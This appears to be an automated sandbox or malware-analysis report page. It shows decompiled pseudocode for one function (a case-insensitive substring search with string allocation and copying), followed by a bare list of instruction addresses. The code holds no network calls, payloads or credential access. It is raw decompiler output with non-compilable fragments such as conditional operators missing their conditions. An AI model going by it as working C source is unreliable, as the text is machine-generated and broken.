Function 00421730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00421730(unsigned int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				char* _t181;
				signed int _t182;
				signed int* _t188;
				signed int _t192;
				signed int* _t193;
				signed int _t198;
				signed int _t202;
				signed int _t205;
				void* _t206;
				signed int _t211;
				signed int _t214;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t244;
				signed int _t245;
				signed int _t251;
				signed int _t252;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				char _t262;
				char _t263;
				signed int _t264;
				signed int _t265;
				void* _t268;
				signed int _t270;
				char _t272;
				unsigned int _t275;
				signed int _t276;
				signed int _t279;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				signed int _t303;
				signed int _t309;
				signed int _t312;
				signed int _t314;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				void* _t325;
				signed int _t326;
				signed int _t327;
				signed int _t330;
				signed int* _t331;
				void* _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t347;
				char _t349;
				char _t350;
				char _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t363;
				unsigned int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				void* _t391;

				_v56 = 0;
				_t353 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t363 = E00411030();
				_t391 = (_t388 & 0xfffffff0) - 0x34 + 4;
				_t181 = _v56;
				if(_t181 == 0) {
					 *_t363 = 0;
					L8:
					_t182 = _a8;
					_v52 = 0x40;
					_v56 = _t363;
					if(_t182 != 0) {
						__eflags = _t363;
						if(_t363 == 0) {
							_t260 = 0x40;
							_t240 = 0;
							L22:
							_t20 = _t240 + 2; // 0x80000001
							_t289 = _t20;
							__eflags = _t289 - 0x40;
							_t290 =  <=  ? 0x40 : _t289;
							__eflags = _t260 - _t290;
							if(_t260 < _t290) {
								_t368 = (_t290 >> 5 >> 0x1a) + _t290 >> 6;
								_t291 = _t290 & 0x8000003f;
								__eflags = _t291;
								if(_t291 < 0) {
									_t291 = (_t291 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t291;
								}
								__eflags = _t291;
								_t370 = _t368 + (0 | _t291 > 0x00000000) << 6;
								_push(_t370);
								_t261 = E00411030();
								_t391 = _t391 + 4;
								_t292 = _v56;
								__eflags = _t292;
								if(_t292 == 0) {
									 *_t261 = 0;
									goto L35;
								} else {
									__eflags = _t261;
									if(_t261 == 0) {
										L33:
										_push(1);
										_push(_t292);
										_v68 = _t261;
										E004110B0();
										_t261 = _v68;
										_t391 = _t391 + 8;
										L35:
										_v52 = _t370;
										_v56 = _t261;
										L36:
										 *((char*)(_t261 + _t240)) = _a8;
										_t188 =  &_v56;
										 *((char*)(_t240 +  *_t188 + 1)) = 0;
										L37:
										_t294 =  *_t188;
										if(_t294 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t241 = E00411030();
											_t391 = _t391 + 4;
											_t192 =  *_a4;
											if(_t192 == 0) {
												 *_t241 = 0;
												L60:
												_t193 = _a4;
												 *_t193 = _t241;
												_t193[1] = 0x40;
												L61:
												_push(1);
												_push(_v56);
												E004110B0();
												_v56 = 0;
												_v52 = 0;
												return _a4;
											}
											if(_t241 == 0) {
												L45:
												_push(1);
												_push(_t192);
												E004110B0();
												_t391 = _t391 + 8;
												goto L60;
											}
											_t296 =  *_t192;
											 *_t241 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t262 =  *((char*)(_t192 + _t297 * 2 - 1));
												 *((char*)(_t241 + _t297 * 2 - 1)) = _t262;
												if(_t262 == 0) {
													goto L45;
												}
												_t263 =  *((char*)(_t192 + _t297 * 2));
												 *((char*)(_t241 + _t297 * 2)) = _t263;
												if(_t263 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t198 =  *_t294;
										if(_t198 != 0) {
											_t355 =  *_t353;
											__eflags = _t355;
											if(_t355 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t241 = E00411030();
												_t391 = _t391 + 4;
												_t202 =  *_a4;
												__eflags = _t202;
												if(_t202 == 0) {
													 *_t241 = 0;
													goto L60;
												}
												__eflags = _t241;
												if(_t241 == 0) {
													L58:
													_push(1);
													_push(_t202);
													E004110B0();
													_t391 = _t391 + 8;
													goto L60;
												}
												_t299 =  *_t202;
												 *_t241 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t264 =  *((char*)(_t202 + _t300 * 2 - 1));
													 *(_t241 + _t300 * 2 - 1) = _t264;
													__eflags = _t264;
													if(_t264 == 0) {
														goto L58;
													}
													_t265 =  *((char*)(_t202 + _t300 * 2));
													 *(_t241 + _t300 * 2) = _t265;
													__eflags = _t265;
													if(_t265 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t355;
											if( *_t355 == 0) {
												goto L52;
											}
											_v48 = _t198;
											_t372 = _t198 - 0x41;
											__eflags = _t372 - 0x19;
											_v64 = _t372;
											_t267 =  >  ? _t198 : _t198 + 0x20;
											_t243 =  >  ? _t198 : _t198 + 0x20;
											_t268 = 0;
											__eflags = 0;
											_v68 =  >  ? _t198 : _t198 + 0x20;
											_v36 = _t294;
											_t244 = _t355;
											while(1) {
												_t301 =  *_t244;
												__eflags = _t301 - 0x41 - 0x19;
												_t302 =  <=  ? _t301 + 0x20 : _t301;
												__eflags = ( <=  ? _t301 + 0x20 : _t301) - _v68;
												if(( <=  ? _t301 + 0x20 : _t301) == _v68) {
													break;
												}
												_t268 = _t268 + 1;
												_t244 = _t244 + 1;
												__eflags =  *((char*)(_t268 + _t355));
												if( *((char*)(_t268 + _t355)) != 0) {
													continue;
												}
												goto L52;
											}
											_t205 = _v48;
											_t303 = _v36;
											__eflags = _t244;
											if(_t244 == 0) {
												goto L52;
											}
											_t270 = _t303 & 0x0000000f;
											_v44 = _t205 + 0x20;
											asm("pxor xmm0, xmm0");
											_v40 = _t355;
											_t377 =  ~_t270 + 0x10;
											__eflags = _t377;
											_v48 = _t205;
											_v36 = _t303;
											do {
												_t356 = _t270;
												__eflags = _t270;
												if(_t270 == 0) {
													L69:
													_v32 = _t377;
													_t309 =  ~( ~_t356 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t309;
													_t378 = _v36;
													while(1) {
														asm("movdqu xmm1, [esi+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t205;
														if(_t205 != 0) {
															break;
														}
														_t356 = _t356 + 0x10;
														__eflags = _t356 - _t309;
														if(_t356 < _t309) {
															continue;
														}
														_v36 = _t378;
														_t379 = _v32;
														__eflags = _t309 - 0x7fffffff;
														if(_t309 >= 0x7fffffff) {
															L77:
															_t309 = 0x7fffffff;
															L78:
															_v60 = _t309;
															_t206 = 0;
															__eflags = 0;
															_v68 = _t270;
															_v32 = _t379;
															while(1) {
																_t310 =  *((char*)(_t206 + _t244));
																_t272 =  *((char*)(_t206 + _v36));
																_t110 = _t310 - 0x61; // 0x7fffff9e
																__eflags = _t110 - 0x19;
																_t111 = _t310 - 0x20; // 0x7fffffdf
																_t311 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																__eflags = _t272 - 0x61 - 0x19;
																_t312 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																_t273 =  <=  ? _t272 - 0x20 : _t272;
																_t274 =  <=  ? _t272 - 0x20 : _t272;
																__eflags = _t312 - ( <=  ? _t272 - 0x20 : _t272);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t312;
																if(_t312 == 0) {
																	L83:
																	_t360 = _v40;
																	__eflags = _t244;
																	if(_t244 == 0) {
																		goto L52;
																	}
																	_t245 = _t244 - _t360;
																	__eflags = _t245;
																	if(_t245 != 0) {
																		_t279 = _t360 & 0x0000000f;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			L97:
																			_t320 =  ~( ~_t279 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																			__eflags = _t320;
																			while(1) {
																				asm("movdqu xmm1, [edi+ecx]");
																				asm("pcmpeqb xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t205;
																				if(_t205 != 0) {
																					break;
																				}
																				_t279 = _t279 + 0x10;
																				__eflags = _t279 - _t320;
																				if(_t279 < _t320) {
																					continue;
																				}
																				__eflags = _t320 - 0x7fffffff;
																				if(_t320 >= 0x7fffffff) {
																					L103:
																					_t320 = 0x7fffffff;
																					L104:
																					_t211 = _t320 >> 0x0000001f & _t320;
																					_t321 = _t320 - _t211;
																					__eflags = _t245;
																					if(_t245 < 0) {
																						L106:
																						_t245 = _t321;
																						L107:
																						_t280 = _a4;
																						 *_t280 = 0;
																						 *((intOrPtr*)(_t280 + 4)) = 0;
																						_t386 = _t211 + _t360;
																						__eflags = _t386;
																						_v64 = _t386;
																						if(_t386 == 0) {
																							L141:
																							_push(0x40);
																							_t241 = E00411030();
																							_t391 = _t391 + 4;
																							_t214 =  *_a4;
																							__eflags = _t214;
																							if(_t214 == 0) {
																								 *_t241 = 0;
																								goto L60;
																							}
																							__eflags = _t241;
																							if(_t241 == 0) {
																								L147:
																								_push(1);
																								_push(_t214);
																								E004110B0();
																								_t391 = _t391 + 8;
																								goto L60;
																							}
																							_t323 =  *_t214;
																							 *_t241 = _t323;
																							__eflags = _t323;
																							if(_t323 == 0) {
																								goto L147;
																							}
																							_t324 = 0;
																							__eflags = 0;
																							while(1) {
																								_t324 = _t324 + 1;
																								_t281 =  *((char*)(_t214 + _t324 * 2 - 1));
																								 *(_t241 + _t324 * 2 - 1) = _t281;
																								__eflags = _t281;
																								if(_t281 == 0) {
																									goto L147;
																								}
																								_t282 =  *((char*)(_t214 + _t324 * 2));
																								 *(_t241 + _t324 * 2) = _t282;
																								__eflags = _t282;
																								if(_t282 != 0) {
																									continue;
																								}
																								goto L147;
																							}
																							goto L147;
																						}
																						__eflags =  *(_t360 + _t211);
																						if( *(_t360 + _t211) == 0) {
																							goto L141;
																						}
																						__eflags = _t245;
																						if(_t245 != 0) {
																							L121:
																							_t137 = _t245 + 1; // 0x80000000
																							_t325 = _t137;
																							__eflags = _t325 - 0x40;
																							_t326 =  <=  ? 0x40 : _t325;
																							__eflags = _t326;
																							if(_t326 > 0) {
																								_v68 = (_t326 >> 5 >> 0x1a) + _t326 >> 6;
																								_t327 = _t326 & 0x8000003f;
																								__eflags = _t327;
																								if(_t327 < 0) {
																									_t327 = (_t327 - 0x00000001 | 0xffffffc0) + 1;
																									__eflags = _t327;
																								}
																								__eflags = _t327;
																								_t330 = _v68 + (0 | _t327 > 0x00000000) << 6;
																								_v68 = _t330;
																								_push(_t330);
																								_t387 = E00411030();
																								_t391 = _t391 + 4;
																								_t226 =  *_a4;
																								__eflags = _t226;
																								if(_t226 == 0) {
																									 *_t387 = 0;
																									goto L133;
																								} else {
																									__eflags = _t387;
																									if(_t387 == 0) {
																										L131:
																										_push(1);
																										_push(_t226);
																										E004110B0();
																										_t391 = _t391 + 8;
																										L133:
																										_t331 = _a4;
																										_t331[1] = _v68;
																										 *_t331 = _t387;
																										L134:
																										__eflags = _t387;
																										if(_t387 == 0) {
																											goto L61;
																										}
																										_t283 = _v64;
																										_t332 = 0;
																										while(1) {
																											_t228 =  *_t283;
																											_t332 = _t332 + 1;
																											 *_t387 = _t228;
																											__eflags = _t245;
																											if(_t245 == 0) {
																												goto L139;
																											}
																											__eflags = _t332 - _t245;
																											if(_t332 == _t245) {
																												 *(_t387 + 1) = 0;
																												goto L61;
																											}
																											L139:
																											__eflags = _t228;
																											if(_t228 == 0) {
																												goto L61;
																											}
																											_t387 = _t387 + 1;
																											_t283 = _t283 + 1;
																											__eflags = _t283;
																										}
																									}
																									_t333 =  *_t226;
																									 *_t387 = _t333;
																									__eflags = _t333;
																									if(_t333 == 0) {
																										goto L131;
																									}
																									_t284 = 0;
																									__eflags = 0;
																									while(1) {
																										_t284 = _t284 + 1;
																										_t334 =  *((char*)(_t226 + _t284 * 2 - 1));
																										 *(_t387 + _t284 * 2 - 1) = _t334;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											goto L131;
																										}
																										_t335 =  *((char*)(_t226 + _t284 * 2));
																										 *(_t387 + _t284 * 2) = _t335;
																										__eflags = _t335;
																										if(_t335 != 0) {
																											continue;
																										}
																										goto L131;
																									}
																									goto L131;
																								}
																							}
																							_t387 = 0;
																							goto L134;
																						}
																						_t361 = _t360 + _t211;
																						_t339 = _t361 & 0x0000000f;
																						__eflags = _t339;
																						if(_t339 == 0) {
																							L114:
																							_t245 =  ~( ~_t339 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t245;
																							while(1) {
																								asm("movdqu xmm1, [edi+edx]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb eax, xmm1");
																								__eflags = _t211;
																								if(_t211 != 0) {
																									break;
																								}
																								_t339 = _t339 + 0x10;
																								__eflags = _t339 - _t245;
																								if(_t339 < _t245) {
																									continue;
																								}
																								__eflags = _t245 - 0x7fffffff;
																								if(_t245 >= 0x7fffffff) {
																									L120:
																									_t245 = 0x7fffffff;
																									goto L121;
																								} else {
																									goto L118;
																								}
																								while(1) {
																									L118:
																									__eflags =  *((char*)(_t245 + _t361));
																									if( *((char*)(_t245 + _t361)) == 0) {
																										goto L121;
																									}
																									_t245 = _t245 + 1;
																									__eflags = _t245 - 0x7fffffff;
																									if(_t245 < 0x7fffffff) {
																										continue;
																									}
																									goto L120;
																								}
																								goto L121;
																							}
																							asm("bsf ebx, eax");
																							_t245 = _t245 + _t339;
																							goto L121;
																						}
																						_t245 = 0;
																						_t339 =  ~_t339 + 0x10;
																						__eflags = _t339;
																						while(1) {
																							__eflags =  *((char*)(_t245 + _t361));
																							if( *((char*)(_t245 + _t361)) == 0) {
																								goto L121;
																							}
																							_t245 = _t245 + 1;
																							__eflags = _t245 - _t339;
																							if(_t245 < _t339) {
																								continue;
																							}
																							goto L114;
																						}
																						goto L121;
																					}
																					__eflags = _t245 - _t321;
																					if(_t245 <= _t321) {
																						goto L107;
																					}
																					goto L106;
																				} else {
																					goto L101;
																				}
																				while(1) {
																					L101:
																					__eflags =  *((char*)(_t320 + _t360));
																					if( *((char*)(_t320 + _t360)) == 0) {
																						goto L104;
																					}
																					_t320 = _t320 + 1;
																					__eflags = _t320 - 0x7fffffff;
																					if(_t320 < 0x7fffffff) {
																						continue;
																					}
																					goto L103;
																				}
																				goto L104;
																			}
																			asm("bsf edx, eax");
																			_t320 = _t320 + _t279;
																			goto L104;
																		}
																		_t320 = 0;
																		_t279 =  ~_t279 + 0x10;
																		__eflags = _t279;
																		while(1) {
																			__eflags =  *((char*)(_t320 + _t360));
																			if( *((char*)(_t320 + _t360)) == 0) {
																				goto L104;
																			}
																			_t320 = _t320 + 1;
																			__eflags = _t320 - _t279;
																			if(_t320 < _t279) {
																				continue;
																			}
																			goto L97;
																		}
																		goto L104;
																	}
																	_t341 = _a4;
																	_push(0x40);
																	 *_t341 = 0;
																	 *((intOrPtr*)(_t341 + 4)) = 0;
																	_t241 = E00411030();
																	_t391 = _t391 + 4;
																	_t233 =  *_a4;
																	__eflags = _t233;
																	if(_t233 == 0) {
																		 *_t241 = 0;
																		goto L60;
																	}
																	__eflags = _t241;
																	if(_t241 == 0) {
																		L91:
																		_push(1);
																		_push(_t233);
																		E004110B0();
																		_t391 = _t391 + 8;
																		goto L60;
																	}
																	_t342 =  *_t233;
																	 *_t241 = _t342;
																	__eflags = _t342;
																	if(_t342 == 0) {
																		goto L91;
																	}
																	_t343 = 0;
																	__eflags = 0;
																	while(1) {
																		_t343 = _t343 + 1;
																		_t286 =  *((char*)(_t233 + _t343 * 2 - 1));
																		 *(_t241 + _t343 * 2 - 1) = _t286;
																		__eflags = _t286;
																		if(_t286 == 0) {
																			goto L91;
																		}
																		_t287 =  *((char*)(_t233 + _t343 * 2));
																		 *(_t241 + _t343 * 2) = _t287;
																		__eflags = _t287;
																		if(_t287 != 0) {
																			continue;
																		}
																		goto L91;
																	}
																	goto L91;
																}
																_t206 = _t206 + 1;
																__eflags = _t206 - _v60;
																if(_t206 < _v60) {
																	continue;
																}
																goto L83;
															}
															_t275 = _v68;
															_t382 = _v32;
															_t314 = _t244 + 1;
															__eflags = _t314;
															if(_t314 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t208 =  <=  ? _v44 : _v48;
															_t205 =  <=  ? _v44 : _v48;
															__eflags =  *(_t244 + 1);
															if( *(_t244 + 1) == 0) {
																goto L52;
															}
															_v68 = _t275;
															_v32 = _t382;
															while(1) {
																_t244 = _t244 + 1;
																_t314 = _t314 + 1;
																_t276 =  *_t244 & 0x000000ff;
																__eflags =  *((char*)(_t314 - 1)) + 0xffffffbf - 0x19;
																_t277 =  <=  ? _t276 + 0x20 : _t276;
																__eflags = ( <=  ? _t276 + 0x20 : _t276) - _t205;
																if(( <=  ? _t276 + 0x20 : _t276) == _t205) {
																	goto L163;
																}
																__eflags =  *_t314;
																if( *_t314 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L163;
														}
														_t205 = _v36;
														while(1) {
															__eflags =  *((char*)(_t309 + _t205));
															if( *((char*)(_t309 + _t205)) == 0) {
																break;
															}
															_t309 = _t309 + 1;
															__eflags = _t309 - 0x7fffffff;
															if(_t309 < 0x7fffffff) {
																continue;
															}
															_v36 = _t205;
															goto L77;
														}
														L158:
														_v36 = _t205;
														L159:
														__eflags = _t309;
														if(__eflags == 0) {
															goto L77;
														}
														if(__eflags > 0) {
															goto L78;
														}
														goto L83;
													}
													asm("bsf edx, eax");
													_v36 = _t378;
													_t309 = _t309 + _t356;
													_t379 = _v32;
													goto L159;
												}
												_t205 = _v36;
												_t356 = _t377;
												_t309 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t309 + _t205));
													if( *((char*)(_t309 + _t205)) == 0) {
														goto L158;
													}
													_t309 = _t309 + 1;
													__eflags = _t309 - _t377;
													if(_t309 < _t377) {
														continue;
													}
													_v36 = _t205;
													goto L69;
												}
												goto L158;
												L163:
												_t270 = _v68;
												_t377 = _v32;
												__eflags = _t244;
											} while (_t244 != 0);
											goto L52;
										}
										goto L39;
									}
									_t236 =  *_t292;
									 *_t261 = _t236;
									__eflags = _t236;
									if(_t236 == 0) {
										goto L33;
									}
									_v60 = _t370;
									_t237 = 0;
									__eflags = 0;
									_v64 = _t240;
									_v68 = _t353;
									while(1) {
										_t237 = _t237 + 1;
										_t251 =  *((char*)(_t292 + _t237 * 2 - 1));
										 *(_t261 + _t237 * 2 - 1) = _t251;
										__eflags = _t251;
										if(_t251 == 0) {
											break;
										}
										_t252 =  *((char*)(_t292 + _t237 * 2));
										 *(_t261 + _t237 * 2) = _t252;
										__eflags = _t252;
										if(_t252 != 0) {
											continue;
										}
										break;
									}
									_t370 = _v60;
									_t240 = _v64;
									_t353 = _v68;
									goto L33;
								}
							}
							_t261 = _v56;
							goto L36;
						}
						_t347 = _t363 & 0x0000000f;
						__eflags = _t347;
						if(_t347 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t258 =  ~( ~_t347 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t258;
							while(1) {
								asm("movdqu xmm1, [esi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t182;
								if(_t182 != 0) {
									break;
								}
								_t347 = _t347 + 0x10;
								__eflags = _t347 - _t258;
								if(_t347 < _t258) {
									continue;
								}
								__eflags = _t258 - 0x7fffffff;
								if(_t258 >= 0x7fffffff) {
									L21:
									_t260 = 0x40;
									_t240 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t258 + _t363));
									if( *((char*)(_t258 + _t363)) == 0) {
										break;
									}
									_t258 = _t258 + 1;
									__eflags = _t258 - 0x7fffffff;
									if(_t258 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L165:
								__eflags = _t240 - 0xfffffffe;
								if(_t240 != 0xfffffffe) {
									_t260 = 0x40;
								} else {
									 *_t363 = 0;
									_t260 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t240 = _t258 + _t347;
							goto L165;
						}
						_t240 = 0;
						_t347 =  ~_t347 + 0x10;
						__eflags = _t347;
						while(1) {
							__eflags =  *((char*)(_t240 + _t363));
							if( *((char*)(_t240 + _t363)) == 0) {
								goto L165;
							}
							_t240 = _t240 + 1;
							__eflags = _t240 - _t347;
							if(_t240 < _t347) {
								continue;
							}
							goto L15;
						}
						goto L165;
					}
					_t188 =  &_v56;
					goto L37;
				}
				if(_t363 == 0) {
					L6:
					_push(1);
					_push(_t181);
					E004110B0();
					_t391 = _t391 + 8;
					goto L8;
				}
				_t349 =  *_t181;
				 *_t363 = _t349;
				if(_t349 == 0) {
					goto L6;
				}
				_t288 = 0;
				while(1) {
					_t288 = _t288 + 1;
					_t350 =  *((char*)(_t181 + _t288 * 2 - 1));
					 *((char*)(_t363 + _t288 * 2 - 1)) = _t350;
					if(_t350 == 0) {
						goto L6;
					}
					_t351 =  *((char*)(_t181 + _t288 * 2));
					 *((char*)(_t363 + _t288 * 2)) = _t351;
					if(_t351 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x0042173e
0x00421742
0x00421744
0x00421748
0x0042174f
0x00421751
0x00421754
0x0042175a
0x00421791
0x00421794
0x00421794
0x00421798
0x004217a0
0x004217a6
0x004217b1
0x004217b3
0x00421e9e
0x00421ea3
0x0042182d
0x00421832
0x00421832
0x00421835
0x00421838
0x0042183b
0x0042183d
0x00421852
0x00421855
0x00421855
0x0042185b
0x00421863
0x00421863
0x00421863
0x00421866
0x0042186d
0x00421870
0x00421876
0x00421878
0x0042187b
0x0042187f
0x00421881
0x004218d6
0x00000000
0x00421883
0x00421883
0x00421885
0x004218c1
0x004218c1
0x004218c3
0x004218c4
0x004218c8
0x004218cd
0x004218d1
0x004218d9
0x004218d9
0x004218dd
0x004218e1
0x004218e5
0x004218e8
0x004218ee
0x004218f3
0x004218f3
0x004218f7
0x00421900
0x00421900
0x00421905
0x00421907
0x00421909
0x00421911
0x00421913
0x00421919
0x0042191d
0x00421957
0x00421a03
0x00421a03
0x00421a06
0x00421a08
0x00421a0f
0x00421a0f
0x00421a11
0x00421a15
0x00421a1f
0x00421a23
0x00421a33
0x00421a33
0x00421921
0x00421947
0x00421947
0x00421949
0x0042194a
0x0042194f
0x00000000
0x0042194f
0x00421923
0x00421926
0x0042192a
0x00000000
0x00000000
0x0042192c
0x0042192e
0x0042192e
0x0042192f
0x00421934
0x0042193a
0x00000000
0x00000000
0x0042193c
0x00421940
0x00421945
0x00000000
0x00000000
0x00000000
0x00421945
0x00000000
0x0042192e
0x004218f9
0x004218fe
0x0042195f
0x00421961
0x00421963
0x004219ac
0x004219ac
0x004219b1
0x004219b3
0x004219b5
0x004219bd
0x004219bf
0x004219c5
0x004219c7
0x004219c9
0x00421a00
0x00000000
0x00421a00
0x004219cb
0x004219cd
0x004219f3
0x004219f3
0x004219f5
0x004219f6
0x004219fb
0x00000000
0x004219fb
0x004219cf
0x004219d2
0x004219d4
0x004219d6
0x00000000
0x00000000
0x004219d8
0x004219d8
0x004219da
0x004219da
0x004219db
0x004219e0
0x004219e4
0x004219e6
0x00000000
0x00000000
0x004219e8
0x004219ec
0x004219ef
0x004219f1
0x00000000
0x00000000
0x00000000
0x004219f1
0x00000000
0x004219da
0x00421965
0x00421968
0x00000000
0x00000000
0x0042196a
0x0042196e
0x00421971
0x00421977
0x0042197b
0x0042197e
0x00421981
0x00421981
0x00421983
0x00421986
0x0042198a
0x0042198c
0x0042198c
0x00421992
0x00421998
0x0042199b
0x0042199e
0x00000000
0x00000000
0x004219a4
0x004219a5
0x004219a6
0x004219aa
0x00000000
0x00000000
0x00000000
0x004219aa
0x00421a36
0x00421a3a
0x00421a3e
0x00421a40
0x00000000
0x00000000
0x00421a4b
0x00421a4e
0x00421a56
0x00421a5a
0x00421a5e
0x00421a5e
0x00421a61
0x00421a65
0x00421a69
0x00421a69
0x00421a6b
0x00421a6d
0x00421a8a
0x00421a96
0x00421a9a
0x00421a9a
0x00421aa0
0x00421aa4
0x00421aa4
0x00421aa9
0x00421aad
0x00421ab1
0x00421ab3
0x00000000
0x00000000
0x00421ab9
0x00421abc
0x00421abe
0x00000000
0x00000000
0x00421ac0
0x00421ac4
0x00421ac8
0x00421ace
0x00421aeb
0x00421aeb
0x00421af0
0x00421af0
0x00421af4
0x00421af4
0x00421af6
0x00421af9
0x00421afd
0x00421b01
0x00421b05
0x00421b09
0x00421b0c
0x00421b0f
0x00421b15
0x00421b18
0x00421b1b
0x00421b21
0x00421b24
0x00421b27
0x00421b29
0x00000000
0x00000000
0x00421b35
0x00421b37
0x00421b40
0x00421b40
0x00421b44
0x00421b46
0x00000000
0x00000000
0x00421b4c
0x00421b4c
0x00421b4e
0x00421bb1
0x00421bb1
0x00421bb4
0x00421bc8
0x00421bd4
0x00421bd4
0x00421bda
0x00421bda
0x00421bdf
0x00421be3
0x00421be7
0x00421be9
0x00000000
0x00000000
0x00421bef
0x00421bf2
0x00421bf4
0x00000000
0x00000000
0x00421bf6
0x00421bfc
0x00421c0d
0x00421c0d
0x00421c12
0x00421c17
0x00421c19
0x00421c1b
0x00421c1d
0x00421c23
0x00421c23
0x00421c25
0x00421c25
0x00421c2c
0x00421c2e
0x00421c31
0x00421c31
0x00421c33
0x00421c37
0x00421d7b
0x00421d7b
0x00421d82
0x00421d84
0x00421d8a
0x00421d8c
0x00421d8e
0x00421dc8
0x00000000
0x00421dc8
0x00421d90
0x00421d92
0x00421db8
0x00421db8
0x00421dba
0x00421dbb
0x00421dc0
0x00000000
0x00421dc0
0x00421d94
0x00421d97
0x00421d99
0x00421d9b
0x00000000
0x00000000
0x00421d9d
0x00421d9d
0x00421d9f
0x00421d9f
0x00421da0
0x00421da5
0x00421da9
0x00421dab
0x00000000
0x00000000
0x00421dad
0x00421db1
0x00421db4
0x00421db6
0x00000000
0x00000000
0x00000000
0x00421db6
0x00000000
0x00421d9f
0x00421c3d
0x00421c41
0x00000000
0x00000000
0x00421c47
0x00421c49
0x00421cb0
0x00421cb5
0x00421cb5
0x00421cb8
0x00421cbb
0x00421cbe
0x00421cc0
0x00421cd6
0x00421cd9
0x00421cd9
0x00421cdf
0x00421ce7
0x00421ce7
0x00421ce7
0x00421cea
0x00421cf4
0x00421cf7
0x00421cfa
0x00421d00
0x00421d02
0x00421d08
0x00421d0a
0x00421d0c
0x00421d43
0x00000000
0x00421d0e
0x00421d0e
0x00421d10
0x00421d36
0x00421d36
0x00421d38
0x00421d39
0x00421d3e
0x00421d46
0x00421d46
0x00421d4c
0x00421d4f
0x00421d51
0x00421d51
0x00421d53
0x00000000
0x00000000
0x00421d59
0x00421d5d
0x00421d63
0x00421d63
0x00421d66
0x00421d67
0x00421d69
0x00421d6b
0x00000000
0x00000000
0x00421d6d
0x00421d6f
0x00421dd0
0x00000000
0x00421dd0
0x00421d71
0x00421d71
0x00421d73
0x00000000
0x00000000
0x00421d61
0x00421d62
0x00421d62
0x00421d62
0x00421d63
0x00421d12
0x00421d15
0x00421d17
0x00421d19
0x00000000
0x00000000
0x00421d1b
0x00421d1b
0x00421d1d
0x00421d1d
0x00421d1e
0x00421d23
0x00421d27
0x00421d29
0x00000000
0x00000000
0x00421d2b
0x00421d2f
0x00421d32
0x00421d34
0x00000000
0x00000000
0x00000000
0x00421d34
0x00000000
0x00421d1d
0x00421d0c
0x00421cc2
0x00000000
0x00421cc2
0x00421c4b
0x00421c4f
0x00421c4f
0x00421c52
0x00421c66
0x00421c72
0x00421c72
0x00421c78
0x00421c78
0x00421c7d
0x00421c81
0x00421c85
0x00421c87
0x00000000
0x00000000
0x00421c8d
0x00421c90
0x00421c92
0x00000000
0x00000000
0x00421c94
0x00421c9a
0x00421cab
0x00421cab
0x00000000
0x00000000
0x00000000
0x00000000
0x00421c9c
0x00421c9c
0x00421c9c
0x00421ca0
0x00000000
0x00000000
0x00421ca2
0x00421ca3
0x00421ca9
0x00000000
0x00000000
0x00000000
0x00421ca9
0x00000000
0x00421c9c
0x00421dd9
0x00421ddc
0x00000000
0x00421ddc
0x00421c56
0x00421c58
0x00421c58
0x00421c5b
0x00421c5b
0x00421c5f
0x00000000
0x00000000
0x00421c61
0x00421c62
0x00421c64
0x00000000
0x00000000
0x00000000
0x00421c64
0x00000000
